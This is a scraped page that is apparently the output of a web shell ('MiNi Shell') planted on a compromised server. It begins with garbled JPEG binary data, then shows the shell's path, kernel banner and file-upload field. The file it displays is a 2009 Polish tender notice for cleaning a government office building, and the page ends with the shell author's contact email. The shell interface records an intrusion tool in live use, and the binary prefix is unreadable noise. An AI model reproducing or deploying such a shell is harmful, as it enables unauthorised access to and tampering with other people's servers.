JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/68063-N-2009.html

<p class="kh_header"><b>Warszawa: Usługi sprzątnia obiektu przy ul. Kruczej 38/42 w Warszawie</b><br>
<b>Numer ogłoszenia: 68063 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Główny Urząd Nadzoru Budowlanego , ul. Krucza 38/42, 00-926 Warszawa, woj. mazowieckie, tel. 022 6619453, faks 022 6619095.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gunb.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi sprzątnia obiektu przy ul. Kruczej 38/42 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi sprzątania obiektu przy ul. Kruczej 38/42 w  Warszawie (główny przedmiot zamówienia wg Wspólnego Słownika Zamówień CPV: 90910000-9).
2. Obiekt to siedmiopiętrowy budynek (dziewięciokondygnacyjny, podpiwniczony), o powierzchni użytkowej 9.868,10 m2,  o płaskim dachu, wraz z otaczającym go terenem.
3. Wykonawca zrealizuje przedmiot zamówienia przy użyciu własnych środków czystości, materiałów oraz sprzętu.
4. Usługi sprzątania obiektu, będące przedmiotem zamówienia, obejmują:
1) w zakresie części I przedmiotu zamówienia - sprzątanie budynku, tj.:
a) sprzątanie powierzchni wewnętrznych i zewnętrznych (terenu zewnętrznego wokół budynku),
b) mycie okien (w tym przeszklonych drzwi) i żaluzji,
2) w zakresie części II przedmiotu zamówienia - sprzątanie dachu, tj. usuwanie z niego śniegu, nawisów śnieżnych i sopli. 
5.  Opis przedmiotu zamówienia w zakresie części I (sprzątanie budynku):
1) dla części Ia (sprzątanie powierzchni wewnętrznych i zewnętrznych):
a) powierzchnie podlegające sprzątaniu: 
- 4.927 m2 - powierzchnia wewnętrzna (pomieszczenia biurowe, klatki schodowe, korytarze, sanitariaty, kuchnie),
- 1.182 m2 - powierzchnia zewnętrzna (teren zewnętrzny wokół budynku),
b) usługi sprzątania powierzchni wewnętrznych będą świadczone w dniach pracy Zamawiającego, tj. w dniach roboczych,
c) usługi sprzątania powierzchni zewnętrznych będą wykonywane codziennie, na bieżąco, we wszystkie dni tygodnia, 
d) w okresie zimowym usuwanie śniegu i oblodzeń powstałych w nocy musi być zakończone do godz. 8.00, w czasie ciągłych opadów usuwanie śniegu i oblodzeń musi być wykonywane na bieżąco, 
2) dla części Ib (mycie okien i żaluzji):
a) prace te będą wykonywane dwukrotnie w okresie obowiązywania umowy (12 miesięcy) na podstawie odrębnych zleceń, w uzgodnionych wcześniej przez przedstawicieli Stron terminach, i będą obejmowały:
- dwustronne mycie szyb, ram i futryn (w tym drzwiowych), a także parapetów,
- dwustronne mycie żaluzji,
b) powierzchnie podlegające myciu:
- 931 m2 - powierzchnia okien (szyby zespolone, w plastikowych ramach, nierozkręcane), w tym przeszklonych drzwi,
- 454 m2 - powierzchnia żaluzji (żaluzje ze stopu aluminiowego).
6. Opis przedmiotu zamówienia w zakresie części II (sprzątanie dachu budynku):
1) parametry dachu: 
a) 1.476 m2 - powierzchnia dachu,
b) 217 m - długość obrysu dachu,
2) usługi w tym zakresie Wykonawca będzie wykonywał w miarę potrzeb na podstawie odrębnych zleceń, przekazywanych przez Zamawiającego:
a) faxem lub e-mailem - w dniach i godzinach pracy Zamawiającego,
b) telefonicznie - poza godzinami pracy Zamawiającego i w dni wolne od pracy,
3) zlecenia będą przyjmowane przez Wykonawcę 24 godziny na dobę, przez 7 dni w tygodniu,
4) Wykonawca przystąpi do sprzątania dachu w terminie do 6 godzin, liczonym od momentu przyjęcia zlecenia.
7. Wykonawca musi posiadać aktualną polisę OC lub inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 100.000 zł (słownie złotych: sto tysięcy 00/100).
8. Wykonawca przed złożeniem oferty, w terminie uzgodnionym z Zamawiającym, może dokonać wizji lokalnej powierzchni podlegających sprzątaniu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wniesienie wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego
2. Ocena spełnienia warunków udziału w postepowaniu będzie dokonana na podstawie wymienionych poniżej dokumentów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Do oferty należy załączyć nastepujące dokumenty, z zastrzeżeniem ust. 2:
1) oświadczenie o spełnieniu warunków udziału w postępowaniu, określonych przepisami art. 22 ust. 1 pkt 1-3 ustawy, o treści zgodnej ze wzorem określonym w załączniku nr 3 do SIWZ,
2) oświadczenie o spełnieniu warunku udziału w postępowaniu, określonego przepisem art. 22 ust. 1 pkt 4 ustawy, co oznacza, że nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 1-9 oraz ust. 2 pkt 1 i 2 ustawy, o treści zgodnej ze wzorem określonym w załączniku nr 4 do SIWZ,
3) aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4) w przypadku Wykonawców składających ofertę na część I przedmiotu zamówienia wykaz (co najmniej dwóch) wykonanych lub wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług sprzątania przez co najmniej 12 miesięcy obiektów biurowych o powierzchni nie mniejszej niż 4.500 m2 albo o wartości usługi nie mniejszej niż 200.000 zł z określeniem przedmiotu usług, ich wartości, wielkości sprzątanych powierzchni, dat wykonania i odbiorców, 
5) dokumenty potwierdzające, że usługi, o których mowa w pkt 4, zostały wykonane należycie (np. referencje).
2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wymagane jest złożenie dokumentu ustanawiającego pełnomocnika Wykonawców do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w formie oryginału lub kopii potwierdzonej notarialnie. W takim przypadku:
1) oświadczenie, o którym mowa w ust. 1 pkt 1, składane jest przez pełnomocnika Wykonawców w imieniu wszystkich Wykonawców,
2) oświadczenie oraz dokument, o których mowa w ust. 1 pkt 2 i 3, składane są przez każdego z Wykonawców,
3) wykaz, o którym mowa w ust. 1 pkt 4, składany jest jako dokument wspólny, a dokumenty, o którym mowa w ust. 1 pkt 5, składane są przez jednego lub więcej Wykonawców, tak aby potwierdzić łącznie spełnienie tego warunku.
3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej w miejsce dokumentu wymienionego w ust. 1 pkt 3, składa wymagany dokument lub dokumenty zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605 ze zm.). 
4. Dokumenty sporządzone w języku obcym należy przedłożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gunb.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać bezpłatnie w siedzibie Głównego Urzędu Nadzoru Budowlanego, w Biurze Dyrektora Generalnego, pok. nr 204, tel. (022) 661 91 69, fax. (022) 629 65 76, w godzinach 8.15-16.15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2009 godzina 11:00, miejsce: Główny Urząd Nadzoru Budowlanego, ul. Krucza 38/42, pok. 204.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzątanie budynku, tj. sprzątanie powierzchni wewnętrznych i zewnętrznych oraz mycie okien i żaluzji.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia w zakresie części I (sprzątanie budynku):
1) dla części Ia (sprzątanie powierzchni wewnętrznych i zewnętrznych):
a) powierzchnie podlegające sprzątaniu: 
- 4.927 m2 - powierzchnia wewnętrzna (pomieszczenia biurowe, klatki schodowe, korytarze, sanitariaty, kuchnie),
- 1.182 m2 - powierzchnia zewnętrzna (teren zewnętrzny wokół budynku),
b) usługi sprzątania powierzchni wewnętrznych będą świadczone w dniach pracy Zamawiającego, tj. w dni robocze,
c) usługi sprzątania powierzchni zewnętrznych będą wykonywane codziennie, na bieżąco, we wszystkie dni tygodnia, 
d) w okresie zimowym usuwanie śniegu i oblodzeń powstałych w nocy musi być zakończone do godz. 8.00, w czasie ciągłych opadów usuwanie śniegu i oblodzeń musi być wykonywane na bieżąco, 
2) dla części Ib (mycie okien i żaluzji):
a) prace te będą wykonywane dwukrotnie w okresie obowiązywania umowy (12 miesięcy) na podstawie odrębnych zleceń, w uzgodnionych wcześniej przez przedstawicieli Stron terminach, i będą obejmowały:
- dwustronne mycie szyb, ram i futryn (w tym drzwiowych), a także parapetów,
- dwustronne mycie żaluzji,
b) powierzchnie podlegające myciu:
- 931 m2 - powierzchnia okien (szyby zespolone, w plastikowych ramach, nierozkręcane), w tym przeszklonych drzwi,
- 454 m2 - powierzchnia żaluzji (żaluzje ze stopu aluminiowego).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzątanie dachu budynku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia w zakresie części II (sprzątanie dachu budynku):
1) parametry dachu: 
a) 1.476 m2 - powierzchnia dachu,
b) 217 m - długość obrysu dachu,
2) usługi w tym zakresie Wykonawca będzie wykonywał w miarę potrzeb na podstawie odrębnych zleceń, przekazywanych przez Zamawiającego:
a) faxem lub e-mailem - w dniach i godzinach pracy Zamawiającego,
b) telefonicznie - poza godzinami pracy Zamawiającego i w dni wolne od pracy,
3) zlecenia będą przyjmowane przez Wykonawcę 24 godziny na dobę, przez 7 dni w tygodniu,
4) Wykonawca przystąpi do sprzątania dachu w terminie do 6 godzin, liczonym od momentu przyjęcia zlecenia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com